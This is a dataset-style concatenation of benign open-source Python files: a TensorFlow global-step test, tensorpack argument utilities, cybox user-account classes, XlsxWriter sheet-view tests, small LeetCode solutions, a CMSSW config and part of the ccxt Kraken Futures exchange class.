move_up()
if cell_is_filled():
x+=1
else:
fill_cell()
while not wall_is_beneath():
move_down()
else:
fill_cell()
move_right()
mov('ax',x)
if __name__ == '__main__':
run_tasks()
| [
"[email protected]"
] | |
f57b234180126f5f12df6e7674e04017a4c1f047 | 7524bec2d88ca21750b09b83cc236cbfb6c61fea | /setup.py | be304e26ac19dc66f8ab4361a1a3074c10526e6b | [] | no_license | ericbusboom/insteon | c3d25f65038624b0bd3a26cf526f7b3c22891916 | f090231e197d517c24ee3b00a6143c2b1f0b89fc | refs/heads/master | 2020-04-19T08:23:51.283619 | 2015-02-14T19:55:10 | 2015-02-14T19:55:10 | 9,122,856 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 554 | py | from setuptools import setup, find_packages
setup(name='esbinsteon',
version='1.0',
description='Program to control an insteon interface. ',
author='Eric Busboom',
author_email='[email protected]',
url='http://busboom.org',
packages=['esbinsteon'],
package_data={'esbinsteon': ['config/*']},
scripts=['scripts/insteon_schedule','scripts/insteon_switch', 'scripts/insteon_install'],
install_requires=[
'pyephem',
'PyYAML',
'python-dateutil'
],
)
| [
"[email protected]"
] | |
7122016d14d9ea48aa260c13465ca27e234421c0 | b5a9d42f7ea5e26cd82b3be2b26c324d5da79ba1 | /tensorflow/python/training/training_util_test.py | 3ec83b7be7f95c031003a009aa40c63af02060b2 | [
"Apache-2.0"
] | permissive | uve/tensorflow | e48cb29f39ed24ee27e81afd1687960682e1fbef | e08079463bf43e5963acc41da1f57e95603f8080 | refs/heads/master | 2020-11-29T11:30:40.391232 | 2020-01-11T13:43:10 | 2020-01-11T13:43:10 | 230,088,347 | 0 | 0 | Apache-2.0 | 2019-12-25T10:49:15 | 2019-12-25T10:49:14 | null | UTF-8 | Python | false | false | 5,363 | py | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for training_util."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
from tensorflow.python.training import monitored_session
from tensorflow.python.training import training_util
@test_util.run_v1_only('b/120545219')
class GlobalStepTest(test.TestCase):
def _assert_global_step(self, global_step, expected_dtype=dtypes.int64):
self.assertEqual('%s:0' % ops.GraphKeys.GLOBAL_STEP, global_step.name)
self.assertEqual(expected_dtype, global_step.dtype.base_dtype)
self.assertEqual([], global_step.get_shape().as_list())
def test_invalid_dtype(self):
with ops.Graph().as_default() as g:
self.assertIsNone(training_util.get_global_step())
variables.Variable(
0.0,
trainable=False,
dtype=dtypes.float32,
name=ops.GraphKeys.GLOBAL_STEP)
self.assertRaisesRegexp(TypeError, 'does not have integer type',
training_util.get_global_step)
self.assertRaisesRegexp(TypeError, 'does not have integer type',
training_util.get_global_step, g)
def test_invalid_shape(self):
with ops.Graph().as_default() as g:
self.assertIsNone(training_util.get_global_step())
variables.VariableV1(
[0],
trainable=False,
dtype=dtypes.int32,
name=ops.GraphKeys.GLOBAL_STEP)
self.assertRaisesRegexp(TypeError, 'not scalar',
training_util.get_global_step)
self.assertRaisesRegexp(TypeError, 'not scalar',
training_util.get_global_step, g)
def test_create_global_step(self):
self.assertIsNone(training_util.get_global_step())
with ops.Graph().as_default() as g:
global_step = training_util.create_global_step()
self._assert_global_step(global_step)
self.assertRaisesRegexp(ValueError, 'already exists',
training_util.create_global_step)
self.assertRaisesRegexp(ValueError, 'already exists',
training_util.create_global_step, g)
self._assert_global_step(training_util.create_global_step(ops.Graph()))
def test_get_global_step(self):
with ops.Graph().as_default() as g:
self.assertIsNone(training_util.get_global_step())
variables.VariableV1(
0,
trainable=False,
dtype=dtypes.int32,
name=ops.GraphKeys.GLOBAL_STEP)
self._assert_global_step(
training_util.get_global_step(), expected_dtype=dtypes.int32)
self._assert_global_step(
training_util.get_global_step(g), expected_dtype=dtypes.int32)
def test_get_or_create_global_step(self):
with ops.Graph().as_default() as g:
self.assertIsNone(training_util.get_global_step())
self._assert_global_step(training_util.get_or_create_global_step())
self._assert_global_step(training_util.get_or_create_global_step(g))
@test_util.run_v1_only('b/120545219')
class GlobalStepReadTest(test.TestCase):
def test_global_step_read_is_none_if_there_is_no_global_step(self):
with ops.Graph().as_default():
self.assertIsNone(training_util._get_or_create_global_step_read())
training_util.create_global_step()
self.assertIsNotNone(training_util._get_or_create_global_step_read())
def test_reads_from_cache(self):
with ops.Graph().as_default():
training_util.create_global_step()
first = training_util._get_or_create_global_step_read()
second = training_util._get_or_create_global_step_read()
self.assertEqual(first, second)
def test_reads_before_increments(self):
with ops.Graph().as_default():
training_util.create_global_step()
read_tensor = training_util._get_or_create_global_step_read()
inc_op = training_util._increment_global_step(1)
inc_three_op = training_util._increment_global_step(3)
with monitored_session.MonitoredTrainingSession() as sess:
read_value, _ = sess.run([read_tensor, inc_op])
self.assertEqual(0, read_value)
read_value, _ = sess.run([read_tensor, inc_three_op])
self.assertEqual(1, read_value)
read_value = sess.run(read_tensor)
self.assertEqual(4, read_value)
if __name__ == '__main__':
test.main()
| [
"[email protected]"
] | |
3870e76c40ced6a801aa513970ff4feb772a2eac | c957b4663cc4cb21e5172f23c6989031be8c3e5b | /python/141. Linked List Cycle.py | 2b938337525872e17fcb52a8afbee163e4aa0323 | [] | no_license | gajanlee/leetcode | e061dc37af0f83bf2bce00c391c0b8a9f3177b22 | 0d3c8477f05604a059e58a8764ce0d8bd418edde | refs/heads/master | 2018-12-26T06:12:24.995542 | 2018-10-30T05:03:27 | 2018-10-30T05:03:27 | 102,965,574 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 718 | py | """
Given a linked list, determine if it has a cycle in it.
Follow up:
Can you solve it without using extra space?
"""
# 如果存在环,那么一个指针移动一个,另外一个移动两个,两个指针会相遇的
# Definition for singly-linked list.
# class ListNode(object):
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution(object):
def hasCycle(self, head):
"""
:type head: ListNode
:rtype: bool
"""
if head is None: return False
l1, l2 = head, head.next
while l1 and l2 and l2.next:
if l1 == l2: return True
l1 = l1.next
l2 = l2.next.next
return False | [
"[email protected]"
] | |
8fe28884609f1cd95401053f75ed6003569df8ab | 2f14f8bccf15ccea2ff50e2f92164b43cb8f78b1 | /Dynamic Programming/LeetCode/MinimumCostForTickets_983.py | a2fbbbecdcf36d899c75b0abeb0b3e3cc2e3c0ba | [] | no_license | nikhiilll/Algorithms-using-Python | b3372f3ecca8e0c8e1358bb5a87391038a6630b6 | 8439864c637578d15915113564dbbf047b75b107 | refs/heads/master | 2023-02-10T23:09:31.312693 | 2020-12-24T16:56:29 | 2020-12-24T16:56:29 | 313,243,919 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 445 | py | def minimumCostForTickets(days, costs):
costArray = [0 for i in range(days[-1] + 1)]
for i in range(1, days[-1] + 1):
if i not in days:
costArray[i] = costArray[i - 1]
else:
costArray[i] = min(costArray[max(0, i - 1)] + costs[0], costArray[max(0, i - 7)] + costs[1], costArray[max(0, i - 30)] + costs[2])
return costArray[-1]
print(minimumCostForTickets([1,4,6,7,8,20], [2,7,15])) | [
"[email protected]"
] | |
0a8e33e5da3e1e73a09e33523e5636f64d2b3abd | 9697a1ab85af91ee587623ac3089adb5dbbd6814 | /configs/QCD_AOD__9_cfg.py | f0f4e8a89e9f22c748119952227009ee9236238a | [] | no_license | nicholas-bower/myLowPtGsfElectronAnalyzer | e9bfaad71631fda4fa67e532015daef2f03edab5 | d4558c124af04f09db9e51e468f8ac3268a940e5 | refs/heads/master | 2022-11-16T21:02:56.940840 | 2020-07-16T15:37:03 | 2020-07-16T15:37:03 | 280,191,555 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,818 | py |
# Auto generated configuration file
# using:
# Revision: 1.19
# Source: /local/reps/CMSSW/CMSSW/Configuration/Applications/python/ConfigBuilder.py,v
# with command line options: test2 -s RAW2DIGI,L1Reco,RECO --datatier RECO --era=Run2_2018 --conditions auto:phase1_2018_realistic --eventcontent RECO --filein file:test.root --no_exec
import FWCore.ParameterSet.Config as cms
#f = open("/uscms_data/d3/nbower/FSU/TestLowPt/CMSSW_10_6_12/src/myLowPtGsfElectronsAnalyzer/myLowPtGsfElectronsAnalyzer/macros/fileLists/m50_ALP_fileList.txt","r")
f = open('./myLowPtGsfElectronsAnalyzer/macros/fileLists/QCD_AOD/QCD_AOD__9.txt','r')
infiles = f.readlines()
f.close()
from FWCore.ParameterSet.VarParsing import VarParsing
options = VarParsing ('python')
options.setDefault('maxEvents',-1)
options.setDefault('inputFiles',infiles)
options.parseArguments()
process = cms.Process('TEST') # ,eras.bParkingOpen
# import of standard configurations
process.maxEvents = cms.untracked.PSet(
input = cms.untracked.int32(options.maxEvents)
)
# Input source
process.source = cms.Source("PoolSource",
fileNames = cms.untracked.vstring(options.inputFiles),
secondaryFileNames = cms.untracked.vstring()
)
process.options = cms.untracked.PSet(
)
# Output definition
# Path and EndPath definitions
process.load('myLowPtGsfElectronsAnalyzer/myLowPtGsfElectronsAnalyzer/myLowPtGsfElectronsAnalyzer_cfi')
# Schedule definition
process.TFileService = cms.Service("TFileService",
fileName = cms.string('root://cmseos.fnal.gov//store/user/nbower/plots/QCD_LowPT/QCD_AOD__9.root')
)
process.p = cms.Path(process.simple)
# Customisation from command line
# End adding early deletion
#open('pydump.py','w').write(process.dumpPython())
| [
"[email protected]"
] | |
2da59e2885e26454205131e62eb8ef38c89aa7d9 | 0b05df6c954e5952369d544a878111798c83be59 | /tensorpack/utils/argtools.py | 743bbaeb089d21c8a3f3e77d64f1937b75fdeb8d | [
"Apache-2.0"
] | permissive | SunskyF/tensorpack | ddd1182acc8cfe6354d08679ef6bae11022b4230 | ffe1398a146312cc74189e529475e67ca0b0cd5c | refs/heads/master | 2020-04-12T09:24:47.182655 | 2018-12-19T07:52:06 | 2018-12-19T07:52:06 | 162,401,727 | 0 | 0 | Apache-2.0 | 2018-12-19T07:49:38 | 2018-12-19T07:49:37 | null | UTF-8 | Python | false | false | 6,132 | py | # -*- coding: utf-8 -*-
# File: argtools.py
import inspect
import six
from . import logger
if six.PY2:
import functools32 as functools
else:
import functools
__all__ = ['map_arg', 'memoized', 'memoized_method', 'graph_memoized', 'shape2d', 'shape4d',
'memoized_ignoreargs', 'log_once', 'call_only_once']
def map_arg(**maps):
"""
Apply a mapping on certain argument before calling the original function.
Args:
maps (dict): {argument_name: map_func}
"""
def deco(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
if six.PY2:
argmap = inspect.getcallargs(func, *args, **kwargs)
else:
# getcallargs was deprecated since 3.5
sig = inspect.signature(func)
argmap = sig.bind_partial(*args, **kwargs).arguments
for k, map_func in six.iteritems(maps):
if k in argmap:
argmap[k] = map_func(argmap[k])
return func(**argmap)
return wrapper
return deco
memoized = functools.lru_cache(maxsize=None)
""" Alias to :func:`functools.lru_cache`
WARNING: memoization will keep keys and values alive!
"""
def graph_memoized(func):
"""
Like memoized, but keep one cache per default graph.
"""
# TODO it keeps the graph alive
import tensorflow as tf
GRAPH_ARG_NAME = '__IMPOSSIBLE_NAME_FOR_YOU__'
@memoized
def func_with_graph_arg(*args, **kwargs):
kwargs.pop(GRAPH_ARG_NAME)
return func(*args, **kwargs)
@functools.wraps(func)
def wrapper(*args, **kwargs):
assert GRAPH_ARG_NAME not in kwargs, "No Way!!"
graph = tf.get_default_graph()
kwargs[GRAPH_ARG_NAME] = graph
return func_with_graph_arg(*args, **kwargs)
return wrapper
_MEMOIZED_NOARGS = {}
def memoized_ignoreargs(func):
"""
A decorator. It performs memoization ignoring the arguments used to call
the function.
"""
def wrapper(*args, **kwargs):
if func not in _MEMOIZED_NOARGS:
res = func(*args, **kwargs)
_MEMOIZED_NOARGS[func] = res
return res
return _MEMOIZED_NOARGS[func]
return wrapper
def shape2d(a):
"""
Ensure a 2D shape.
Args:
a: a int or tuple/list of length 2
Returns:
list: of length 2. if ``a`` is a int, return ``[a, a]``.
"""
if type(a) == int:
return [a, a]
if isinstance(a, (list, tuple)):
assert len(a) == 2
return list(a)
raise RuntimeError("Illegal shape: {}".format(a))
def get_data_format(data_format, tfmode=True):
if tfmode:
dic = {'NCHW': 'channels_first', 'NHWC': 'channels_last'}
else:
dic = {'channels_first': 'NCHW', 'channels_last': 'NHWC'}
ret = dic.get(data_format, data_format)
if ret not in dic.values():
raise ValueError("Unknown data_format: {}".format(data_format))
return ret
def shape4d(a, data_format='channels_last'):
"""
Ensuer a 4D shape, to use with 4D symbolic functions.
Args:
a: a int or tuple/list of length 2
Returns:
list: of length 4. if ``a`` is a int, return ``[1, a, a, 1]``
or ``[1, 1, a, a]`` depending on data_format.
"""
s2d = shape2d(a)
if get_data_format(data_format) == 'channels_last':
return [1] + s2d + [1]
else:
return [1, 1] + s2d
@memoized
def log_once(message, func='info'):
"""
Log certain message only once. Call this function more than one times with
the same message will result in no-op.
Args:
message(str): message to log
func(str): the name of the logger method. e.g. "info", "warn", "error".
"""
getattr(logger, func)(message)
def call_only_once(func):
"""
Decorate a method or property of a class, so that this method can only
be called once for every instance.
Calling it more than once will result in exception.
"""
@functools.wraps(func)
def wrapper(*args, **kwargs):
self = args[0]
# cannot use hasattr here, because hasattr tries to getattr, which
# fails if func is a property
assert func.__name__ in dir(self), "call_only_once can only be used on method or property!"
if not hasattr(self, '_CALL_ONLY_ONCE_CACHE'):
cache = self._CALL_ONLY_ONCE_CACHE = set()
else:
cache = self._CALL_ONLY_ONCE_CACHE
cls = type(self)
# cannot use ismethod(), because decorated method becomes a function
is_method = inspect.isfunction(getattr(cls, func.__name__))
assert func not in cache, \
"{} {}.{} can only be called once per object!".format(
'Method' if is_method else 'Property',
cls.__name__, func.__name__)
cache.add(func)
return func(*args, **kwargs)
return wrapper
def memoized_method(func):
"""
A decorator that performs memoization on methods. It stores the cache on the object instance itself.
"""
@functools.wraps(func)
def wrapper(*args, **kwargs):
self = args[0]
assert func.__name__ in dir(self), "memoized_method can only be used on method!"
if not hasattr(self, '_MEMOIZED_CACHE'):
cache = self._MEMOIZED_CACHE = {}
else:
cache = self._MEMOIZED_CACHE
key = (func, ) + args[1:] + tuple(kwargs)
ret = cache.get(key, None)
if ret is not None:
return ret
value = func(*args, **kwargs)
cache[key] = value
return value
return wrapper
if __name__ == '__main__':
class A():
def __init__(self):
self._p = 0
@call_only_once
def f(self, x):
print(x)
@property
def p(self):
return self._p
@p.setter
@call_only_once
def p(self, val):
self._p = val
a = A()
a.f(1)
b = A()
b.f(2)
b.f(1)
print(b.p)
print(b.p)
b.p = 2
print(b.p)
b.p = 3
print(b.p)
| [
"[email protected]"
] | |
5b13733fd9888fea4a5dbbefc18f3413b70f4bec | 75e84467a370b22aae4f30ab1fa7b42ccec9cb85 | /cybox/objects/user_account_object.py | b25c7ea95eded4bb86a815050cbf12cda9073d4f | [
"BSD-3-Clause"
] | permissive | cy-fir/python-cybox | cbe6eaafeac2a0dcb2ba06925ea72c3c44e29f42 | 292a378be5322032e8df0b9a110c2205b72aeee6 | refs/heads/master | 2020-12-31T03:36:26.544132 | 2016-01-22T22:05:25 | 2016-01-22T22:05:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,075 | py | # Copyright (c) 2015, The MITRE Corporation. All rights reserved.
# See LICENSE.txt for complete terms.
from mixbox import entities
from mixbox import fields
import cybox.bindings.user_account_object as user_account_binding
from cybox.common import DateTime, Duration, String
from cybox.objects.account_object import Account
class Group(entities.Entity):
"""An abstract class for account groups."""
def __init__(self):
raise TypeError("Cannot instantiate abstract type.")
class GroupList(entities.EntityList):
_binding = user_account_binding
_binding_class = user_account_binding.GroupListType
_binding_var = 'Group'
_contained_type = Group
_namespace = 'http://cybox.mitre.org/objects#UserAccountObject-2'
class Privilege(entities.Entity):
"""An abstract class for account privileges."""
def __init__(self):
raise TypeError("Cannot instantiate abstract type.")
class PrivilegeList(entities.EntityList):
_binding = user_account_binding
_binding_class = user_account_binding.PrivilegeListType
_binding_var = 'Privilege'
_contained_type = Privilege
_namespace = 'http://cybox.mitre.org/objects#UserAccountObject-2'
class UserAccount(Account):
_binding = user_account_binding
_binding_class = user_account_binding.UserAccountObjectType
_namespace = 'http://cybox.mitre.org/objects#UserAccountObject-2'
_XSI_NS = "UserAccountObj"
_XSI_TYPE = "UserAccountObjectType"
password_required = fields.TypedField('password_required')
full_name = fields.TypedField('Full_Name', String)
home_directory = fields.TypedField('Home_Directory', String)
last_login = fields.TypedField('Last_Login', DateTime)
script_path = fields.TypedField('Script_Path', String)
username = fields.TypedField('Username', String)
user_password_age = fields.TypedField('User_Password_Age', Duration)
# These should be overriden by subclasses
group_list = fields.TypedField('Group_List', GroupList)
privilege_list = fields.TypedField('Privilege_List', PrivilegeList)
| [
"[email protected]"
] | |
925fde5c4d36383db5a4ca3dd2f2a95b0eac5cd1 | 45de7d905486934629730945619f49281ad19359 | /xlsxwriter/test/worksheet/test_write_sheet_view.py | 80b851daa21e858de10d231daeeebed0d8042104 | [
"BSD-2-Clause"
] | permissive | jmcnamara/XlsxWriter | 599e1d225d698120ef931a776a9d93a6f60186ed | ab13807a1be68652ffc512ae6f5791d113b94ee1 | refs/heads/main | 2023-09-04T04:21:04.559742 | 2023-08-31T19:30:52 | 2023-08-31T19:30:52 | 7,433,211 | 3,251 | 712 | BSD-2-Clause | 2023-08-28T18:52:14 | 2013-01-04T01:07:06 | Python | UTF-8 | Python | false | false | 3,163 | py | ###############################################################################
#
# Tests for XlsxWriter.
#
# SPDX-License-Identifier: BSD-2-Clause
# Copyright (c), 2013-2023, John McNamara, [email protected]
#
import unittest
from io import StringIO
from ...worksheet import Worksheet
class TestWriteSheetView(unittest.TestCase):
"""
Test the Worksheet _write_sheet_view() method.
"""
def setUp(self):
self.fh = StringIO()
self.worksheet = Worksheet()
self.worksheet._set_filehandle(self.fh)
def test_write_sheet_view_tab_not_selected(self):
"""Test the _write_sheet_view() method. Tab not selected"""
self.worksheet._write_sheet_view()
exp = """<sheetView workbookViewId="0"/>"""
got = self.fh.getvalue()
self.assertEqual(got, exp)
def test_write_sheet_view_tab_selected(self):
"""Test the _write_sheet_view() method. Tab selected"""
self.worksheet.select()
self.worksheet._write_sheet_view()
exp = """<sheetView tabSelected="1" workbookViewId="0"/>"""
got = self.fh.getvalue()
self.assertEqual(got, exp)
def test_write_sheet_view_hide_gridlines(self):
"""Test the _write_sheet_view() method. Tab selected + hide_gridlines()"""
self.worksheet.select()
self.worksheet.hide_gridlines()
self.worksheet._write_sheet_view()
exp = """<sheetView tabSelected="1" workbookViewId="0"/>"""
got = self.fh.getvalue()
self.assertEqual(got, exp)
def test_write_sheet_view_hide_gridlines_0(self):
"""Test the _write_sheet_view() method. Tab selected + hide_gridlines(0)"""
self.worksheet.select()
self.worksheet.hide_gridlines(0)
self.worksheet._write_sheet_view()
exp = """<sheetView tabSelected="1" workbookViewId="0"/>"""
got = self.fh.getvalue()
self.assertEqual(got, exp)
def test_write_sheet_view_hide_gridlines_1(self):
"""Test the _write_sheet_view() method. Tab selected + hide_gridlines(1)"""
self.worksheet.select()
self.worksheet.hide_gridlines(1)
self.worksheet._write_sheet_view()
exp = """<sheetView tabSelected="1" workbookViewId="0"/>"""
got = self.fh.getvalue()
self.assertEqual(got, exp)
def test_write_sheet_view_hide_gridlines_2(self):
"""Test the _write_sheet_view() method. Tab selected + hide_gridlines(2)"""
self.worksheet.select()
self.worksheet.hide_gridlines(2)
self.worksheet._write_sheet_view()
exp = """<sheetView showGridLines="0" tabSelected="1" workbookViewId="0"/>"""
got = self.fh.getvalue()
self.assertEqual(got, exp)
def test_write_sheet_view_hide_row_col_headers(self):
"""Test the _write_sheet_views() method"""
self.worksheet.select()
self.worksheet.hide_row_col_headers()
self.worksheet._write_sheet_view()
exp = (
"""<sheetView showRowColHeaders="0" tabSelected="1" workbookViewId="0"/>"""
)
got = self.fh.getvalue()
self.assertEqual(got, exp)
| [
"[email protected]"
] | |
34ccd95eb23058af1f6b7eed3183fba1b29c0fe7 | af2b03bd1f7c54059b04687a825cf774b073351a | /python/ccxt/async_support/krakenfutures.py | 65ee6cb4d35f0a519b6f9d1316995705580f8b76 | [
"MIT"
] | permissive | street2geek/ccxt | 2b480526758b0629bad95c756e6c645964babe94 | e880b59112717b693985f5e4beb88cdefaab9e57 | refs/heads/master | 2023-05-25T16:50:07.920596 | 2023-05-16T11:51:48 | 2023-05-16T11:51:48 | 148,709,392 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 82,024 | py | # -*- coding: utf-8 -*-
# PLEASE DO NOT EDIT THIS FILE, IT IS GENERATED AND WILL BE OVERWRITTEN:
# https://github.com/ccxt/ccxt/blob/master/CONTRIBUTING.md#how-to-contribute-code
from ccxt.async_support.base.exchange import Exchange
from ccxt.abstract.krakenfutures import ImplicitAPI
import hashlib
from ccxt.base.types import OrderSide
from typing import Optional
from typing import List
from ccxt.base.errors import ExchangeError
from ccxt.base.errors import ArgumentsRequired
from ccxt.base.errors import BadRequest
from ccxt.base.errors import InsufficientFunds
from ccxt.base.errors import InvalidOrder
from ccxt.base.errors import OrderNotFound
from ccxt.base.errors import OrderImmediatelyFillable
from ccxt.base.errors import OrderNotFillable
from ccxt.base.errors import DuplicateOrderId
from ccxt.base.errors import DDoSProtection
from ccxt.base.errors import RateLimitExceeded
from ccxt.base.errors import ExchangeNotAvailable
from ccxt.base.errors import InvalidNonce
from ccxt.base.errors import AuthenticationError
from ccxt.base.decimal_to_precision import TICK_SIZE
from ccxt.base.precise import Precise
class krakenfutures(Exchange, ImplicitAPI):
def describe(self):
return self.deep_extend(super(krakenfutures, self).describe(), {
'id': 'krakenfutures',
'name': 'Kraken Futures',
'countries': ['US'],
'version': 'v3',
'userAgent': None,
'rateLimit': 600,
'pro': True,
'has': {
'CORS': None,
'spot': False,
'margin': False,
'swap': True,
'future': True,
'option': False,
'cancelAllOrders': True,
'cancelOrder': True,
'createMarketOrder': False,
'createOrder': True,
'editOrder': True,
'fetchBalance': True,
'fetchBorrowRate': False,
'fetchBorrowRateHistories': False,
'fetchBorrowRateHistory': False,
'fetchBorrowRates': False,
'fetchBorrowRatesPerSymbol': False,
'fetchClosedOrders': None, # https://support.kraken.com/hc/en-us/articles/360058243651-Historical-orders
'fetchFundingHistory': None,
'fetchFundingRate': False,
'fetchFundingRateHistory': True,
'fetchFundingRates': False,
'fetchIndexOHLCV': False,
'fetchIsolatedPositions': False,
'fetchLeverageTiers': True,
'fetchMarketLeverageTiers': 'emulated',
'fetchMarkets': True,
'fetchMarkOHLCV': True,
'fetchMyTrades': True,
'fetchOHLCV': True,
'fetchOpenOrders': True,
'fetchOrder': False,
'fetchOrderBook': True,
'fetchOrders': False,
'fetchPositions': True,
'fetchPremiumIndexOHLCV': False,
'fetchTickers': True,
'fetchTrades': True,
'setLeverage': False,
'setMarginMode': False,
'transfer': True,
},
'urls': {
'test': {
'public': 'https://demo-futures.kraken.com/derivatives/api/',
'private': 'https://demo-futures.kraken.com/derivatives/api/',
'www': 'https://demo-futures.kraken.com',
},
'logo': 'https://user-images.githubusercontent.com/24300605/81436764-b22fd580-9172-11ea-9703-742783e6376d.jpg',
'api': {
'charts': 'https://futures.kraken.com/api/charts/',
'history': 'https://futures.kraken.com/api/history/',
'feeschedules': 'https://futures.kraken.com/api/feeschedules/',
'public': 'https://futures.kraken.com/derivatives/api/',
'private': 'https://futures.kraken.com/derivatives/api/',
},
'www': 'https://futures.kraken.com/',
'doc': [
'https://support.kraken.com/hc/en-us/categories/360001806372-Futures-API',
],
'fees': 'https://support.kraken.com/hc/en-us/articles/360022835771-Transaction-fees-and-rebates-for-Kraken-Futures',
'referral': None,
},
'api': {
'public': {
'get': [
'instruments',
'orderbook',
'tickers',
'history',
'historicalfundingrates',
],
},
'private': {
'get': [
'openpositions',
'notifications',
'accounts',
'openorders',
'recentorders',
'fills',
'transfers',
],
'post': [
'sendorder',
'editorder',
'cancelorder',
'transfer',
'batchorder',
'cancelallorders',
'cancelallordersafter',
'withdrawal', # for futures wallet -> kraken spot wallet
],
},
'charts': {
'get': [
'{price_type}/{symbol}/{interval}',
],
},
'history': {
'get': [
'orders',
'executions',
'triggers',
'accountlogcsv',
'market/{symbol}/orders',
'market/{symbol}/executions',
],
},
'feeschedules': {
'get': [
'volumes',
],
},
},
'fees': {
'trading': {
'tierBased': False,
'percentage': True,
'maker': self.parse_number('-0.0002'),
'taker': self.parse_number('0.00075'),
},
},
'exceptions': {
'exact': {
'apiLimitExceeded': RateLimitExceeded,
'marketUnavailable': ExchangeNotAvailable,
'requiredArgumentMissing': BadRequest,
'unavailable': ExchangeNotAvailable,
'authenticationError': AuthenticationError,
'accountInactive': ExchangeError, # When account has no trade history / no order history. Should self error be ignored in some cases?
'invalidAccount': BadRequest, # the fromAccount or the toAccount are invalid
'invalidAmount': BadRequest,
'insufficientFunds': InsufficientFunds,
'Bad Request': BadRequest, # The URL contains invalid characters.(Please encode the json URL parameter)
'Unavailable': InsufficientFunds, # Insufficient funds in Futures account [withdraw]
},
'broad': {
'invalidArgument': BadRequest,
'nonceBelowThreshold': InvalidNonce,
'nonceDuplicate': InvalidNonce,
},
},
'precisionMode': TICK_SIZE,
'options': {
'access': {
'history': {
'GET': {
'orders': 'private',
'executions': 'private',
'triggers': 'private',
'accountlogcsv': 'private',
},
},
},
'settlementCurrencies': {
'flex': ['USDT', 'BTC', 'USD', 'GBP', 'EUR', 'USDC'],
},
'symbol': {
'quoteIds': ['USD', 'XBT'],
'reversed': False,
},
'versions': {
'public': {
'GET': {
'historicalfundingrates': 'v4',
},
},
'charts': {
'GET': {
'{price_type}/{symbol}/{interval}': 'v1',
},
},
'history': {
'GET': {
'orders': 'v2',
'executions': 'v2',
'triggers': 'v2',
'accountlogcsv': 'v2',
},
},
},
},
'timeframes': {
'1m': '1m',
'5m': '5m',
'15m': '15m',
'30m': '30m',
'1h': '1h',
'4h': '4h',
'12h': '12h',
'1d': '1d',
'1w': '1w',
},
})
async def fetch_markets(self, params={}):
"""
Fetches the available trading markets from the exchange, Multi-collateral markets are returned markets, but can be settled in multiple currencies
see https://docs.futures.kraken.com/#http-api-trading-v3-api-instrument-details-get-instruments
:param dict params: exchange specific params
:returns: An array of market structures
"""
response = await self.publicGetInstruments(params)
#
# {
# "result": "success",
# "instruments": [
# {
# "symbol": "fi_ethusd_180928",
# "type": "futures_inverse", # futures_vanilla # spot index
# "underlying": "rr_ethusd",
# "lastTradingTime": "2018-09-28T15:00:00.000Z",
# "tickSize": 0.1,
# "contractSize": 1,
# "tradeable": True,
# "marginLevels": [
# {
# "contracts":0,
# "initialMargin":0.02,
# "maintenanceMargin":0.01
# },
# {
# "contracts":250000,
# "initialMargin":0.04,
# "maintenanceMargin":0.02
# },
# ...
# ],
# "isin": "GB00JVMLMP88",
# "retailMarginLevels": [
# {
# "contracts": 0,
# "initialMargin": 0.5,
# "maintenanceMargin": 0.25
# }
# ],
# "tags": [],
# },
# {
# "symbol": "in_xbtusd",
# "type": "spot index",
# "tradeable":false
# }
# ]
# "serverTime": "2018-07-19T11:32:39.433Z"
# }
#
instruments = self.safe_value(response, 'instruments', [])
result = []
for i in range(0, len(instruments)):
market = instruments[i]
id = self.safe_string(market, 'symbol')
marketType = self.safe_string(market, 'type')
type = None
index = (marketType.find(' index') >= 0)
linear = None
inverse = None
expiry = None
if not index:
linear = (marketType.find('_vanilla') >= 0)
inverse = not linear
settleTime = self.safe_string(market, 'lastTradingTime')
type = 'swap' if (settleTime is None) else 'future'
expiry = self.parse8601(settleTime)
else:
type = 'index'
swap = (type == 'swap')
future = (type == 'future')
symbol = id
split = id.split('_')
splitMarket = self.safe_string(split, 1)
baseId = splitMarket[0:len(splitMarket) - 3]
quoteId = 'usd' # always USD
base = self.safe_currency_code(baseId)
quote = self.safe_currency_code(quoteId)
# swap == perpetual
settle = None
settleId = None
amountPrecision = self.parse_number(self.parse_precision(self.safe_string(market, 'contractValueTradePrecision', '0')))
pricePrecision = self.safe_number(market, 'tickSize')
contract = (swap or future or index)
swapOrFutures = (swap or future)
if swapOrFutures:
exchangeType = self.safe_string(market, 'type')
if exchangeType == 'futures_inverse':
settle = base
settleId = baseId
inverse = True
else:
settle = quote
settleId = quoteId
inverse = False
linear = not inverse
symbol = base + '/' + quote + ':' + settle
if future:
symbol = symbol + '-' + self.yymmdd(expiry)
result.append({
'id': id,
'symbol': symbol,
'base': base,
'quote': quote,
'settle': settle,
'baseId': baseId,
'quoteId': quoteId,
'settleId': settleId,
'type': type,
'spot': False,
'margin': False,
'swap': swap,
'future': future,
'option': False,
'index': index,
'active': None,
'contract': contract,
'linear': linear,
'inverse': inverse,
'contractSize': self.safe_number(market, 'contractSize'),
'maintenanceMarginRate': None,
'expiry': expiry,
'expiryDatetime': self.iso8601(expiry),
'strike': None,
'optionType': None,
'precision': {
'amount': amountPrecision,
'price': pricePrecision,
},
'limits': {
'leverage': {
'min': None,
'max': None,
},
'amount': {
'min': None,
'max': None,
},
'price': {
'min': None,
'max': None,
},
'cost': {
'min': None,
'max': None,
},
},
'info': market,
})
settlementCurrencies = self.options['settlementCurrencies']['flex']
currencies = []
for i in range(0, len(settlementCurrencies)):
code = settlementCurrencies[i]
currencies.append({
'id': code.lower(),
'numericId': None,
'code': code,
'precision': None,
})
